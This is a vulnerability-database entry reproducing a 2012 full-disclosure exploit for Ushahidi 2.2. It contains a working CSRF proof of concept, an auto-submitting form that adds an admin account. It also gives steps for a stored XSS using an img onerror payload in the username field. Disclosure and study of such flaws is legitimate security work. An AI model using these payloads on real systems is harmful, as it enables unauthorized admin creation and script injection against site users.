Lucene search
K

Ushahidi 2.2 - Multiple Vulnerabilites

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 25 Views

Ushahidi 2.2 Multiple Vulnerabilities CSRF Add Admin PoC and Persistent XS

Code

                                                # Exploit Title: Ushahidi 2.2 Multiple Vulnerabilites
# Date: 04/12/2012
# Author: shpendk
# Software Link: http://download.ushahidi.com/
# Version: 2.2
# Tested on: Xampp on Windows
# Vendor Contact: 		03/25/2012
-> Contacted again:		03/28/2012
-> No Response yet:		04/11/2012
-> Full Disclosure:		04/12/2012



1) CSRF Add Admin PoC:

-----------------------------------------------------------------------------------------------------
<html>
<body>
<form action="http://127.0.0.1/admin/users/edit" method="POST">
<input type="hidden" name="name" value="myname">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="role" value="admin">
<input type="hidden" name="username" value="shpendk">
<input type="hidden" name="notify" value="1">
<input type="hidden" name="password" value="letmein">
<input type="hidden" name="password_again" value="letmein">
</form>
<script> document.forms[0].submit(); </script>

</body>
</html>
		
-------------------------------------------------------------------------------------------------------



2) Persistent XSS

------------------------------------------------------------------------------------------------------

	-> Go to http://127.0.0.1/login
	-> Create New User
		-> Enter username: <img/onerror="alert(123)"src=a>
	-> Login as Admin and go to http://127.0.0.1/admin/users
		
------------------------------------------------------------------------------------------------------


                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
25